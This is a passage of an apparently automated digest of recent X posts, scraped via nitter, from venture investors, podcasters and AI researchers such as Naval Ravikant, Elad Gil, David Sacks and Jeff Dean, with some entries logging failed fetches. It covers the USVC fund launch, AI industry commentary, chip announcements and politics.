Ravikant(11 条)\n\n**[2026-04-24T11:53:43+00:00]**\n> RT by @naval: Fundrise VCX is exactly why USVC needs to exist. Retail wants access to OpenAI, Anthropic, SpaceX, xAI, etc. That demand is not going away. VCX turned that demand into a liquid public w…\n[原文链接](https://nitter.net/alexbass/status/2047645157080658335#m)\n\n**[2026-04-24T05:39:10+00:00]**\n> R to @naval: x.com/avlok/status/204754692…\n[原文链接](https://nitter.net/naval/status/2047550896670908809#m)\n\n**[2026-04-24T05:23:22+00:00]**\n> RT by @naval: I’ve seen a lot of questions about USVC, AngelList’s newest product. First, don’t invest in venture capital if you can’t afford to lose your money. Put your savings somewhere safer. But…\n[原文链接](https://nitter.net/avlok/status/2047546920747307466#m)\n\n**[2026-04-24T03:37:14+00:00]**\n> Hari nails it: “Don’t listen to people who don’t know how private markets work.”\n[原文链接](https://nitter.net/naval/status/2047520212787015748#m)\n\n**[2026-04-24T03:33:25+00:00]**\n> R to @naval: x.com/haridigresses/status/2…\n[原文链接](https://nitter.net/naval/status/2047519250433421604#m)\n\n**[2026-04-24T02:58:19+00:00]**\n> R to @naval: x.com/nivi/status/2047471220…\n[原文链接](https://nitter.net/naval/status/2047510419565420779#m)\n\n**[2026-04-24T01:01:28+00:00]**\n> RT by @naval: USVC is a new fund being offered by Naval, it's been discussed widely on X. I have some thoughts and why people should look into it. I have no connection with it and not being paid to s…\n[原文链接](https://nitter.net/Cernovich/status/2047481012826124516#m)\n\n**[2026-04-24T00:22:33+00:00]**\n> RT by @naval: I spent the morning digging into USVC fees. TLDR: In my opinion, there is no lower-cost way to invest in VC other than becoming one. I’m expecting to pay the same or less than it costs …\n[原文链接](https://nitter.net/nivi/status/2047471220451578132#m)\n\n**[2026-04-23T15:20:52+00:00]**\n> RT by @naval: We launched USVC yesterday and it was one of the most fun days of my career Thousands of people ended up subscribing for literally tens of millions of dollars While most of the receptio…\n[原文链接](https://nitter.net/ankurnagpal/status/2047334901033123913#m)\n\n**[2026-04-22T16:34:52+00:00]**\n> Introducing USVC - a single basket of high-growth venture capital, for everyone. No accreditation required, SEC-registered, and a very low $500 minimum. Includes OpenAI, Anthropic, xAI, Sierra, Cruso…\n[原文链接](https://nitter.net/naval/status/2046991137022648800#m)\n\n**[2026-04-22T14:36:51+00:00]**\n> RT by @naval: Announcing my new thing: I'm launching a new public venture fund USVC is built by AngelList with @naval shaping our investment strategy in the technology companies building our future A…\n[原文链接](https://nitter.net/ankurnagpal/status/2046961436593713241#m)\n\n---\n\n### ✅ @eladgil — Elad Gil(20 条)\n\n**[2026-04-26T02:40:47+00:00]**\n> Saturday song https://youtu.be/D8MoLNxLE98?si=yRsm9viuy3NYvnJ0\n[原文链接](https://nitter.net/eladgil/status/2048230781739581745#m)\n\n**[2026-04-24T18:44:49+00:00]**\n> RT by @eladgil: Adopting Claude speak in my regular life, episode 1: Partner: Did you do the dishes tonight? Me: Yes they're done. Partner: Why are they still dirty? Me: You're right to push back. I …\n[原文链接](https://nitter.net/awnihannun/status/2047748613976264835#m)\n\n**[2026-04-24T01:35:02+00:00]**\n> New life plan- Move to Brooklyn Get neck tat Ride bike everywhere Cold brew own coffee (also start drinking coffee) Adopt 12 year old stray cat, name him Nietzsche Vape mango pods, but ironically Wea…\n[原文链接](https://nitter.net/eladgil/status/2047489459378397604#m)\n\n**[2026-04-23T21:04:47+00:00]**\n> RT by @eladgil: How does one make sense of SF? We are living through the craziest computing revolution of the last 2 decades....and 95% of the value being created is within a 4-mile radius in SF (h/t…\n[原文链接](https://nitter.net/adityaag/status/2047421448449630379#m)\n\n**[2026-04-23T17:55:03+00:00]**\n> Entrepreneurship is a distributed search job across the surface of commercial opportunities\n[原文链接](https://nitter.net/eladgil/status/2047373700643844303#m)\n\n**[2026-04-23T17:20:32+00:00]**\n> Big congrats\n[原文链接](https://nitter.net/eladgil/status/2047365014500389353#m)\n\n**[2026-04-23T17:19:56+00:00]**\n> My view is the AI boom will only accelerate and is a once in a lifetime transformation This is orthogonal to whether many AI companies should exit in next 12-18 months, as some may lack durability vs…\n[原文链接](https://nitter.net/eladgil/status/2047364865527075139#m)\n\n**[2026-04-22T20:39:39+00:00]**\n> <3 @infisical\n[原文链接](https://nitter.net/eladgil/status/2047052737762980083#m)\n\n**[2026-04-21T22:45:48+00:00]**\n> What a time to be alive\n[原文链接](https://nitter.net/eladgil/status/2046722094348771758#m)\n\n**[2026-04-21T20:58:54+00:00]**\n> 👀\n[原文链接](https://nitter.net/eladgil/status/2046695194054320150#m)\n\n**[2026-04-21T19:36:05+00:00]**\n> The dark alchemy that is loonen sparkling + salt of the earth electrolytes 😱\n[原文链接](https://nitter.net/eladgil/status/2046674350993223784#m)\n\n**[2026-04-21T17:21:44+00:00]**\n> AI for email++\n[原文链接](https://nitter.net/eladgil/status/2046640542218604783#m)\n\n**[2026-04-20T23:50:03+00:00]**\n> 🔥\n[原文链接](https://nitter.net/eladgil/status/2046375878368940239#m)\n\n**[2026-04-20T18:51:07+00:00]**\n> R to @eladgil: Link to fuller post: https://substack.com/home/post/p-194229552?source=queue\n[原文链接](https://nitter.net/eladgil/status/2046300649483374704#m)\n\n**[2026-04-20T17:46:29+00:00]**\n> Here is the sbstack version \"Random thoughts while gazing at the misty AI Frontier\" https://blog.eladgil.com/p/random-thoughts-while-gazing-at-the\n[原文链接](https://nitter.net/eladgil/status/2046284381439103043#m)\n\n**[2026-04-20T17:45:44+00:00]**\n> R to @eladgil: 13/12 Anti-AI regulation & violence will both increase It is important for leaders in tech and AI to point out the benefits of AI to society and the world more aggressively\n[原文链接](https://nitter.net/eladgil/status/2046284194943500453#m)\n\n**[2026-04-20T17:45:44+00:00]**\n> R to @eladgil: 12/12 Most AI companies should consider exiting in the next 12-18 months\n[原文链接](https://nitter.net/eladgil/status/2046284191885922498#m)\n\n**[2026-04-20T17:45:43+00:00]**\n> R to @eladgil: 11/12 AI is about selling work, not software. Units of labor as the product This is a big shift in TAM, agents, how to build product in the AI era. Many AI markets are 10-100X the size…\n[原文链接](https://nitter.net/eladgil/status/2046284190132609299#m)\n\n**[2026-04-20T17:45:43+00:00]**\n> R to @eladgil: 10/12 Harness creating more and more stickiness to models If you look at the use of AI coding tools, the harness (and broader product surface area eg UX, workflow, etc) seems to be inc…\n[原文链接](https://nitter.net/eladgil/status/2046284188622737554#m)\n\n**[2026-04-20T17:45:42+00:00]**\n> R to @eladgil: 9/12 Artisanal engineers will be be increasingly unhappy inside companies. Deep artisanal “my code is my craft” and “I love creating bespoke things” engineers decreasingly happy in wor…\n[原文链接](https://nitter.net/eladgil/status/2046284184877187540#m)\n\n---\n\n### ✅ @DavidSacks — David Sacks(19 条)\n\n**[2026-04-26T20:42:24+00:00]**\n> MSM hoax factories like the Atlantic love to allege conflicts of interest without ever disclosing their own.\n[原文链接](https://nitter.net/DavidSacks/status/2048502978626113625#m)\n\n**[2026-04-26T17:37:26+00:00]**\n> RT by @DavidSacks: Accurate\n[原文链接](https://nitter.net/elonmusk/status/2048456433981591867#m)\n\n**[2026-04-26T15:03:35+00:00]**\n> RT by @DavidSacks: Cole Allen, the gunman from last night’s WH Correspondents Dinner, maintained an active online presence, especially on the leftwing social media platform Bluesky where he went by t…\n[原文链接](https://nitter.net/AndrewKolvet/status/2048417712439689346#m)\n\n**[2026-04-25T18:47:09+00:00]**\n> RT by @DavidSacks: .@POTUS: \"We want to beat China at the industry. We're leading with crypto, we're leading with AI, and I really feel I have an obligation... as a President, I have to be able to ma…\n[原文链接](https://nitter.net/RapidResponse47/status/2048111588930986354#m)\n\n**[2026-04-25T13:54:41+00:00]**\n> RT by @DavidSacks: Probably the best take I have heard on why there is so much fear around software exposure in private equity and credit because of AI From David Sacks \"Historically we only had two …\n[原文链接](https://nitter.net/BoringBiz_/status/2048037985765949537#m)\n\n**[2026-04-25T03:16:09+00:00]**\n> RT by @DavidSacks: Incredible return on investment! 💰💰💰\n[原文链接](https://nitter.net/elonmusk/status/2047877294476116184#m)\n\n**[2026-04-25T02:52:39+00:00]**\n> SPLC invested $270k in Charlottesville and got $81 million in additional donations. Extraordinary returns.\n[原文链接](https://nitter.net/DavidSacks/status/2047871382923469241#m)\n\n**[2026-04-25T02:37:36+00:00]**\n> Marc Benioff is the apex cloud founder. He and Salesforce have turned every previous technology wave to their advantage. Cloud, social, mobile, big data. I predict AI will be no different.\n[原文链接](https://nitter.net/DavidSacks/status/2047867592790946189#m)\n\n**[2026-04-25T00:55:54+00:00]**\n> RT by @DavidSacks: SACKS: “We're really lucky that [Trump] is President … when this AI revolution is happening.” JASON: “What would happen if Kamala ‘Ding Dong’ was in right now?” SACKS: “We'd have n…\n[原文链接](https://nitter.net/TheChiefNerd/status/2047842000632713369#m)\n\n**[2026-04-24T23:41:01+00:00]**\n> RT by @DavidSacks: David Sacks: We're lucky that Trump's the President when this AI revolution is happening. @Jason \"Do an alt history, Sacks, what would happen if Kamala Ding Dong was in right now?\"…\n[原文链接](https://nitter.net/jayplemons/status/2047823154655932696#m)\n\n**[2026-04-24T22:41:49+00:00]**\n> RT by @DavidSacks: POD UP! Core four is back 🚨 Big show: -- SpaceX-Cursor deal, using compute as leverage -- SaaS debt bomb coming to PE?, venture debt risk -- Software bloodbath, buy low potential? …\n[原文链接](https://nitter.net/theallinpod/status/2047808256047821141#m)\n\n**[2026-04-24T16:41:47+00:00]**\n> R to @DavidSacks: UPDATE: the DOJ has joined @xAI’s lawsuit against Colorado on First Amendment grounds. AI models should not be required to alter truthful output to comply with DEI.\n[原文链接](https://nitter.net/DavidSacks/status/2047717649849659586#m)\n\n**[2026-04-24T15:43:39+00:00]**\n> RT by @DavidSacks: David Sacks on Anthropic-Pentagon dispute, Musk-Altman feud and SpaceX-Cursor deal: https://cnb.cx/4d3HAKp\n[原文链接](https://nitter.net/SquawkCNBC/status/2047703023690924289#m)\n\n**[2026-04-24T15:10:25+00:00]**\n> RT by @DavidSacks: .@DavidSacks: \"We know that @AnthropicAI makes good products. They are smart people, there’s no question about it... we don’t care what their personal views are. What we care about…\n[原文链接](https://nitter.net/RapidResponse47/status/2047694657107165519#m)\n\n**[2026-04-24T13:41:49+00:00]**\n> R to @DavidSacks: Full article: https://www.wsj.com/lifestyle/careers/are-college-graduates-finally-catching-a-break-in-this-job-market-38c37541?st=fxk6Dg&reflink=article_copyURL_share\n[原文链接](https://nitter.net/DavidSacks/status/2047672359377588241#m)\n\n**[2026-04-24T13:39:13+00:00]**\n> Narrative violation: Hiring of new college graduates is up 5.6% over last year. Youth unemployment for degreed 20–24‑year‑olds fell to 5.3% from 8.9%. Weren’t we told that 50% of entry-level jobs wer…\n[原文链接](https://nitter.net/DavidSacks/status/2047671706660073767#m)\n\n**[2026-04-23T00:04:16+00:00]**\n> R to @DavidSacks: Full article: https://www.foxnews.com/politics/anthropics-moral-compass-architect-suggested-ai-overcorrection-could-address-historical-injustices\n[原文链接](https://nitter.net/DavidSacks/status/2047104229773279572#m)\n\n**[2026-04-23T00:03:16+00:00]**\n> Reverse discrimination does not undo historical injustices but rather perpetrates new ones against a different set of individuals. This foments social strife and undermines the ideal of America as a …\n[原文链接](https://nitter.net/DavidSacks/status/2047103978979119580#m)\n\n**[2026-04-21T16:50:07+00:00]**\n> RT by @DavidSacks: This is insane… The Virginia redistricting amendment on the ballot today is framed as a vote to \"restore fairness in the upcoming elections.\" In reality, it turns a state that Kama…\n[原文链接](https://nitter.net/Geiger_Capital/status/2046632586735243420#m)\n\n---\n\n### ✅ @jason — Jason Calacanis(19 条)\n\n**[2026-04-27T15:03:32+00:00]**\n> Best accounts for following Austin air quality? @grok\n[原文链接](https://nitter.net/Jason/status/2048780089295302690#m)\n\n**[2026-04-27T01:51:02+00:00]**\n> Incredible writing from @euphoriaHBO\n[原文链接](https://nitter.net/Jason/status/2048580651985604783#m)\n\n**[2026-04-26T19:42:30+00:00]**\n> I’ve invested in 700 private companies Providing liquidity and loans to high performing founders is completely standard. In fact, investors encourage loans and secondary sales for founders to enable …\n[原文链接](https://nitter.net/Jason/status/2048487905543237675#m)\n\n**[2026-04-26T18:14:04+00:00]**\n> Ok @Acosta, balls in your court\n[原文链接](https://nitter.net/Jason/status/2048465651723882972#m)\n\n**[2026-04-26T18:05:09+00:00]**\n> The NYTimes focus last week was micro-looting, social murder and meaningless private company transactions designed to ferment class warfare. Disgraziad\n[原文链接](https://nitter.net/Jason/status/2048463405590225173#m)\n\n**[2026-04-26T17:13:01+00:00]**\n> Who made this?!\n[原文链接](https://nitter.net/Jason/status/2048450286902235560#m)\n\n**[2026-04-26T16:21:34+00:00]**\n> I’m proud to announce I’m hosting an exhibition cage match between @Acosta and @mtracey on July 4th $100,000 cash prize Vegas 3, 3 minute rounds\n[原文链接](https://nitter.net/Jason/status/2048437340218044499#m)\n\n**[2026-04-26T16:16:34+00:00]**\n> Once again, the substack party result in a Donnybrook — it’s like the source awards for wordmaxxers\n[原文链接](https://nitter.net/Jason/status/2048436081725464959#m)\n\n**[2026-04-26T13:51:54+00:00]**\n> RT by @Jason: Random pic of @Jason protecting our $TAO bags\n[原文链接](https://nitter.net/nordin_eth/status/2048399674269213067#m)\n\n**[2026-04-26T03:57:07+00:00]**\n> The left has a serious violence problem, which @DavidSacks called out early and often. This generation of woke democratic socialists are morally bankrupt. They believe in looting and violence as a po…\n[原文链接](https://nitter.net/Jason/status/2048249992163242220#m)\n\n**[2026-04-26T03:46:17+00:00]**\n> If you’re not condemning these lunatics, you’re advocating for the end of the American empire. I’m not for canceling people, but the fact the @nytimes and @newyorker not only employees these individu…\n[原文链接](https://nitter.net/Jason/status/2048247267182658004#m)\n\n**[2026-04-26T03:40:08+00:00]**\n> Heroes 🫡\n[原文链接](https://nitter.net/Jason/status/2048245718171648271#m)\n\n**[2026-04-25T21:25:29+00:00]**\n> x.com/i/spaces/1nGeLyjZrkvKX\n[原文链接](https://nitter.net/Jason/status/2048151434928017429#m)\n\n**[2026-04-25T19:06:45+00:00]**\n> nightmare blunt rotation\n[原文链接](https://nitter.net/Jason/status/2048116521436590260#m)\n\n**[2026-04-25T19:06:07+00:00]**\n> today #knicks @mikal_bridges to 6th man/leads the bench in scoring Knicks play @23savage____ 26 minutes, he has 5 offensive boards We're up 20+ points in the second half @ATLHawks backs broken; they …\n[原文链接](https://nitter.net/Jason/status/2048116362766127514#m)\n\n**[2026-04-25T17:57:08+00:00]**\n> RT by @Jason: AngelList introduced USVC: venture investing for non-accredited investors starting at $500. Hear why Jason thinks the social media criticisms lack merit and says: \"More liquidity for in…\n[原文链接](https://nitter.net/twistartups/status/2048099001782985057#m)\n\n**[2026-04-25T15:11:10+00:00]**\n> RT by @Jason: The future of coding isn't reading lines of code. It's specifying outcomes and getting binaries back. Elon said it. Aravind from Perplexity agrees. And startups are already making it a …\n[原文链接](https://nitter.net/twistartups/status/2048057234865693125#m)\n\n**[2026-04-25T02:02:48+00:00]**\n> WTF are these lunatics up to…\n[原文链接](https://nitter.net/Jason/status/2047858837319774540#m)\n\n**[2026-04-24T23:01:04+00:00]**\n> RT by @Jason: Planning an event usually means juggling dozens of vendors, scattered payments, and zero visibility. It's a logistical mess. LAMAT is fixing the chaos. It's a marketplace that lets orga…\n[原文链接](https://nitter.net/LAUNCH/status/2047813100091449428#m)\n\n---\n\n### ✅ @HarryStebbings — Harry Stebbings(19 条)\n\n**[2026-04-27T14:02:33+00:00]**\n> Adam Foroughi is by far one of the best CEOs I have ever interviewed. Candidly he is insanely stern and cold but also obsessive, focused and utterly brilliant. With Adam there is zero fluff, like non…\n[原文链接](https://nitter.net/HarryStebbings/status/2048764741435179442#m)\n\n**[2026-04-27T14:02:33+00:00]**\n> R to @HarryStebbings: Spotify https://open.spotify.com/episode/5KPihKzCMKY2DnPeuSxXZ5 Apple Podcasts https://podcasts.apple.com/us/podcast/20vc-applovin-%24160bn-market-cap-%245-48bn-revenue-%2410m/i…\n[原文链接](https://nitter.net/HarryStebbings/status/2048764743205134644#m)\n\n**[2026-04-27T13:30:16+00:00]**\n> Two areas I would love to invest that are non-technical: 1. Egg freezing clinics. In 10 years, strongly believe every 21 year old will freeze their eggs and it becomes the norm. Amazing business. Ins…\n[原文链接](https://nitter.net/HarryStebbings/status/2048756619622707452#m)\n\n**[2026-04-26T22:34:46+00:00]**\n> We hired someone for the investing team. Something I never planned to do. They sent the team 3 new deals per day for 90 days straight. All aligned to our stage, geography and deal type. That’s how yo…\n[原文链接](https://nitter.net/HarryStebbings/status/2048531257399664920#m)\n\n**[2026-04-26T19:35:39+00:00]**\n> I have interviewed 1,000 of the best CEOs of the last 10 years. Adam Foroughi, Founder @AppLovin is easily top 3, ever. $160BN Market Cap $5.48BN Revenue $10M EBITDA per head 82%+ margins Just 450 pe…\n[原文链接](https://nitter.net/HarryStebbings/status/2048486182904852537#m)\n\n**[2026-04-26T15:07:55+00:00]**\n> Seeing two types of founders emerge in this moment: The tourists and the terminators. The terminators are salivating at the opportunity ahead. Hungrier than ever. More ambitious than ever. They want …\n[原文链接](https://nitter.net/HarryStebbings/status/2048418806867870115#m)\n\n**[2026-04-26T13:56:31+00:00]**\n> The best founders I know all text their investors. None of them email them. The relationship will blossom and deepen in a matter of messages.\n[原文链接](https://nitter.net/HarryStebbings/status/2048400836024283246#m)\n\n**[2026-04-24T21:38:00+00:00]**\n> This week I got to sit down with two truly generational CEOs and ask them anything: @tobi @Shopify ($160BN Market Cap) Adam Foroughi @AppLovin ($160BN Market Cap) I have the best job in the world.\n[原文链接](https://nitter.net/HarryStebbings/status/2047792195868967172#m)\n\n**[2026-04-24T15:04:00+00:00]**\n> How Claude Design Will Hurt Figma \"Claude Design will not replace Figma directly, but it will chip away at it. It removes the need to wait for designers by letting people go straight from idea to pro…\n[原文链接](https://nitter.net/HarryStebbings/status/2047693043080261672#m)\n\n**[2026-04-23T23:43:00+00:00]**\n> Why the biggest fintech players are in for a shock. \"The shift is from human UX to agent UX. In the past, you won with dashboards, design and user experience. Now, the buyer is an AI agent, and it on…\n[原文链接](https://nitter.net/HarryStebbings/status/2047461264998478113#m)\n\n**[2026-04-23T21:23:00+00:00]**\n> I used to think MAUs and WAUs were the dumbest metric. Now I think it's the most important. \"I used to think MAUs and WAUs did not matter, now I think they are critical. In the AI era, usage is the l…\n[原文链接](https://nitter.net/HarryStebbings/status/2047426032840634830#m)\n\n**[2026-04-23T20:32:21+00:00]**\n> Slightly soppy bromance post but Jason believed in me when I was 18 and at law school still. There were next to no signs 20VC was or would be a success. He has been a dear friend ever since!\n[原文链接](https://nitter.net/HarryStebbings/status/2047413285675290984#m)\n\n**[2026-04-23T17:48:00+00:00]**\n> Does the $60BN Cursor Deal Make Sense: \"It actually makes sense when you look at what each side lacks. One has explosive revenue but weak margins due to compute and model costs. The other has massive…\n[原文链接](https://nitter.net/HarryStebbings/status/2047371926335857036#m)\n\n**[2026-04-23T16:53:42+00:00]**\n> It is a very expensive desire to be a value investor today. It is much easier to be a momentum investor, that is for sure.\n[原文链接](https://nitter.net/HarryStebbings/status/2047358263868436791#m)\n\n**[2026-04-23T14:06:50+00:00]**\n> This is the big f**king deal. Cursor acquired for $60BN by xAI I sat down with @jasonlk and @rodriscoll to discuss the deal, along with the biggest news in tech this week: - Anthropic Hits $1TRN in S…\n[原文链接](https://nitter.net/HarryStebbings/status/2047316267858645088#m)\n\n**[2026-04-23T14:06:50+00:00]**\n> R to @HarryStebbings: Spotify 👉 https://open.spotify.com/episode/6EjWkbt83H2WXhDMjjS7PF Youtube 👉 https://youtu.be/s61XVZAt5ns Apple Podcasts 👉 https://podcasts.apple.com/us/podcast/20vc-cursor-acqui…\n[原文链接](https://nitter.net/HarryStebbings/status/2047316269465006363#m)\n\n**[2026-04-22T13:07:07+00:00]**\n> I have interviewed 1,000 founders over 10 years. If I could only invest in five, this would be them: 1. Nik Storonsky (Revolut) 2. @alanchanguk (Fuse Energy) 3. Adam Foroughi (AppLovin) 4. @awxjack (…\n[原文链接](https://nitter.net/HarryStebbings/status/2046938853445959738#m)\n\n**[2026-04-21T20:17:56+00:00]**\n> I have interviewed 1,000 CEOs of the largest companies over the last 10 years. Adam Foroughi is top 5 I have ever met. Easily. AppLovin Market Cap: $160BN Revenue: $5.48BN EBITDA per Head: $10M There…\n[原文链接](https://nitter.net/HarryStebbings/status/2046684883494600911#m)\n\n**[2026-04-21T15:37:00+00:00]**\n> In a world of agents, how do software providers prevent themselves from becoming valueless databases? \"The value proposition has to be: 1. How good are your APIs? 2. How well designed are they 3. Are…\n[原文链接](https://nitter.net/HarryStebbings/status/2046614183513604299#m)\n\n---\n\n### ⚠️ @lmsqueegie — Lars Nielsen(获取失败)\n\n- 错误: nitter=URLError: ; snscrape=snscrape_unavailable: No module named 'snscrape'; rsshub=HTTPError: HTTP Error 503: Service Unavailable\n\n### ✅ @david__tian — David Tian(0 条)\n\n---\n\n### ⚠️ @Bitking_ — BTCKing(获取失败)\n\n- 错误: nitter=URLError: ; snscrape=snscrape_unavailable: No module named 'snscrape'; rsshub=HTTPError: HTTP Error 503: Service Unavailable\n\n### ✅ @CryptoCred — Credible Crypto(1 条)\n\n**[2026-04-22T22:25:51+00:00]**\n> Dev is posting about price\n[原文链接](https://nitter.net/CryptoCred/status/2047079463750377958#m)\n\n---\n\n### ✅ @AltcoinBuzz — Altcoin Buzz(0 条)\n\n---\n\n### ✅ @TradingGods — Trading Gods(0 条)\n\n---\n\n### ✅ @Warrior_Trading — Warrior Trading(0 条)\n\n---\n\n### ✅ @ProfTrading — Profitable Trading(0 条)\n\n---\n\n### ✅ @SatoshiBun — Satoshi(12 条)\n\n**[2026-04-25T15:26:45+00:00]**\n> RT by @satoshibun: Another big reason why I don’t necessarily agree with changing the base designs, I think they’re perfect for a medium budget kids cartoon, Qwel’s new art style making them look mor…\n[原文链接](https://nitter.net/images_i_love3/status/2048061157685010444#m)\n\n**[2026-04-24T18:45:53+00:00]**\n> RT by @satoshibun: Baby’s first con\n[原文链接](https://nitter.net/Aaron_Margolin/status/2047748882952778044#m)\n\n**[2026-04-24T17:05:22+00:00]**\n> RT by @satoshibun: Bring home a bundle of cuteness with the #tokidoki Baby Unicorno Series! 🦄🍼💖 Available on our website!\n[原文链接](https://nitter.net/tokidoki/status/2047723587528782152#m)\n\n**[2026-04-24T16:16:22+00:00]**\n> RT by @satoshibun: Good morning! Rise and shine, gamers!\n[原文链接](https://nitter.net/shopculturefly/status/2047711254379393160#m)\n\n**[2026-04-24T11:40:30+00:00]**\n> Im genuinely this Close to killing myself rn & this Shit happens like Okay\n[原文链接](https://nitter.net/satoshibun/status/2047641832624893993#m)\n\n**[2026-04-24T11:06:42+00:00]**\n> RT by @satoshibun: How do Delilah Defenders actively defend her actions with these Toons literally existing. I just don't get it\n[原文链接](https://nitter.net/DaCapTainXD/status/2047633324676440561#m)\n\n**[2026-04-24T09:21:13+00:00]**\n> RT by @satoshibun: 😾\n[原文链接](https://nitter.net/aaa___kanato/status/2047606779677376714#m)\n\n**[2026-04-24T08:00:10+00:00]**\n> RT by @satoshibun: ♦️━━━━━━━━━━━━━♣️ ⠀⠀⠀⠀⠀⠀⠀『#文字化化』 ⠀「不思議の国のアリス」テーマ ⠀グラフアート新商品発売決定! ♠️━━━━━━━━━━━━━♥️ 📅5/23~6/5 📍eeo Store 池袋本店 🛒通販でも販売開始!:https://eeo.today/store/101/title/6785?utm_source=twitter&ut…\n[原文链接](https://nitter.net/eeo_store/status/2047586383519531500#m)\n\n**[2026-04-23T18:56:53+00:00]**\n> RT by @satoshibun: Shadow Milk Cookie’s Mind Blown Jester\n[原文链接](https://nitter.net/breadstickz1/status/2047389262253855041#m)\n\n**[2026-04-23T14:42:44+00:00]**\n> RT by @satoshibun: OH MYG GDOODOISU #moeoverload 🥹\n[原文链接](https://nitter.net/cuckuke/status/2047325302771061148#m)\n\n**[2026-04-22T19:09:40+00:00]**\n> RT by @satoshibun: old pvsm\n[原文链接](https://nitter.net/ricemoochie/status/2047030091293889009#m)\n\n**[2026-04-22T02:03:48+00:00]**\n> RT by @satoshibun: they're about to start making out\n[原文链接](https://nitter.net/savanaclavv/status/2046771924064186549#m)\n\n---\n\n### ⚠️ @直播带逛Tommy — Tommy(获取失败)\n\n- 错误: invalid_handle_for_nitter\n\n### ✅ @AndrewYNg — Andrew Ng(0 条)\n\n---\n\n### ✅ @JeffDean — Jeff Dean(12 条)\n\n**[2026-04-27T13:40:08+00:00]**\n> The video of my conversation with Amin Vahdat, @gilbert, and @djrosent at Cloud Next last week is now up. https://youtu.be/BpnJYJmbXcM?si=vUY3hI_aDX8K6gco Thanks for a great conversation!\n[原文链接](https://nitter.net/JeffDean/status/2048759102390899142#m)\n\n**[2026-04-26T10:41:25+00:00]**\n> RT by @JeffDean: THE FIRST MAN IN HISTORY TO BREAK 2 HOURS IN A MARATHON!!!🤯🤯🤯 Sabastian Sawe 🇰🇪 has just shattered the World Record at the London Marathon, running 1:59:30!!! He makes history as the…\n[原文链接](https://nitter.net/TrackGazette/status/2048351736037826877#m)\n\n**[2026-04-24T13:12:52+00:00]**\n> R to @JeffDean: The Arxiv for the new Decoupled DiLoCo paper is now up: https://arxiv.org/abs/2604.21428v1\n[原文链接](https://nitter.net/JeffDean/status/2047665074471387456#m)\n\n**[2026-04-23T20:15:06+00:00]**\n> R to @JeffDean: It's worth pointing out that we have been pushing on large-scale training and asynchronous techniques for the last ~14 years. Here's our NeurIPS 2012 paper where we demonstrated that …\n[原文链接](https://nitter.net/JeffDean/status/2047408945950802186#m)\n\n**[2026-04-23T20:09:30+00:00]**\n> R to @JeffDean: TPU 8i is co-designed with our Gemini research team to support low latency inference. Among the attributes that support this are large amounts of on-chip SRAM, enabling more computati…\n[原文链接](https://nitter.net/JeffDean/status/2047407537566495033#m)\n\n**[2026-04-23T20:00:58+00:00]**\n> R to @JeffDean: First, let's talk about TPU 8t, which is designed for large-scale training and inference throughput. The pod size is increased slightly to 9600 chips, and provides ~3X the FP4 perform…\n[原文链接](https://nitter.net/JeffDean/status/2047405389856297387#m)\n\n**[2026-04-23T19:55:08+00:00]**\n> I had a good time discussing yesterday's Google TPU v8t and v8i announcement at Cloud Next with Amin Vahdat along with @AcquiredFM hosts @gilbert and @djrosent. The blog post announcement has lots of…\n[原文链接](https://nitter.net/JeffDean/status/2047403921912873257#m)\n\n**[2026-04-23T15:41:07+00:00]**\n> It's been a delight to provide small amounts of advice and suggestions to people working on the Decoupled DiLoCo training system. This approach enables graceful handling of failures in large scale tr…\n[原文链接](https://nitter.net/JeffDean/status/2047339995682529313#m)\n\n**[2026-04-21T19:31:28+00:00]**\n> RT by @JeffDean: My friend @JeffDean encouraged me to speak at this event so come join me on May 26 in San Jose! https://bauplanlabs.github.io/SAO-workshop/\n[原文链接](https://nitter.net/ceo_clickhouse/status/2046673188193701901#m)\n\n**[2026-04-21T17:02:26+00:00]**\n> RT by @JeffDean: The future of computer vision is agentic. 1/ We built Nomadic around a gap we kept seeing in video understanding: VLMs generate chain-of-thought that's fluent and often correct in st…\n[原文链接](https://nitter.net/nomadicai/status/2046635685206208533#m)\n\n**[2026-04-21T16:50:26+00:00]**\n> RT by @JeffDean: Following positive feedback from other venues, like STOC and ICML, NeurIPS is pleased to announce a new initiative in partnership with Google: for NeurIPS 2026, authors will have acc…\n[原文链接](https://nitter.net/NeurIPSConf/status/2046632664493384060#m)\n\n**[2026-04-20T21:46:52+00:00]**\n> RT by @JeffDean: Read how Google built custom silicon and infrastructure - and how it's benefiting customers today - in the latest from @Bloomberg. We'll share more updates this week at #GoogleCloudN…\n[原文链接](https://nitter.net/ThomasOrTK/status/2046344875994739028#m)\n\n---\n\n### ✅ @soumithchintala — Soumith Chintala(4 条)\n\n**[2026-04-27T13:29:14+00:00]**\n> This is kinda interesting. Anthro probably needs to scale up Account Support via Claude or via humans (traditional account managers). Would be funny if they chose humans. Alternatively, more and more…\n[原文链接](https://nitter.net/soumithchintala/status/2048756358820827564#m)\n\n**[2026-04-23T05:52:02+00:00]**\n> RT by @soumithchintala: Incredible work by Sony published in @Nature today! 🏓 They’ve built “Ace”, an autonomous ping-pong robot that uses RL and Sony’s vision sensors to achieve expert-level play in…\n[原文链接](https://nitter.net/hardmaru/status/2047191747793649805#m)\n\n**[2026-04-20T17:40:46+00:00]**\n> RT by @soumithchintala: Dwarkesh is not an AGI party bro. He's been pretty diverse in how he seeks alpha from across a wide variety of industries. I enjoy the hell out of a lot of his podcasts. This …\n[原文链接](https://nitter.net/soumithchintala/status/2046282944139215141#m)\n\n**[2026-04-20T16:32:46+00:00]**\n> The Jensen + @dwarkesh_sp podcast was fantastic. Jensen is someone who understood how ecosystems work and someone who understands real-world trade, policy and controls work. And in some deeper sense …\n[原文链接](https://nitter.net/soumithchintala/status/2046265830908870983#m)\n\n---\n\n### ⚠️ @MikeAI — Michael(获取失败)\n\n- 错误: nitter=URLError: ; snscrape=snscrape_unavailable: No module named 'snscrape'; rsshub=HTTPError: HTTP Error 503: Service Unavailable\n\n### ✅ @Ronald_vanLoon — Ronald van Loon(20 条)\n\n**[2026-04-27T15:23:07+00:00]**\n> Faster Than Human Reflexes: A #Robotic Hand Redefining Speed and Precision by @sciencegirl #Robotics #Engineering #ArtificialIntelligence #Innovation #Technology\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048785019083128974#m)\n\n**[2026-04-27T15:00:27+00:00]**\n> R to @Ronald_vanLoon: Here’s the bottom line: AI won’t be won by who moves fastest. It’ll be won by who governs best. If your data isn’t structured, contextualized, and controlled, scaling AI will on…\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048779312854118829#m)\n\n**[2026-04-27T15:00:26+00:00]**\n> R to @Ronald_vanLoon: The real bottleneck isn’t models. It’s unstructured data. I saw a side-by-side demo that made this obvious: → 